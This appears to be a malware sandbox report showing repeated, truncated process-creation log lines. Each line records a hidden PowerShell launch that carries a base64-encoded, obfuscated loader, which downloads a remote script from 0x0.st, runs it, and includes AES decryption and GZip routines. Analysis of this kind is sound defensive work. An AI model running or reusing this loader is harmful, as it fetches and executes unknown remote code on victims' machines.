                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGF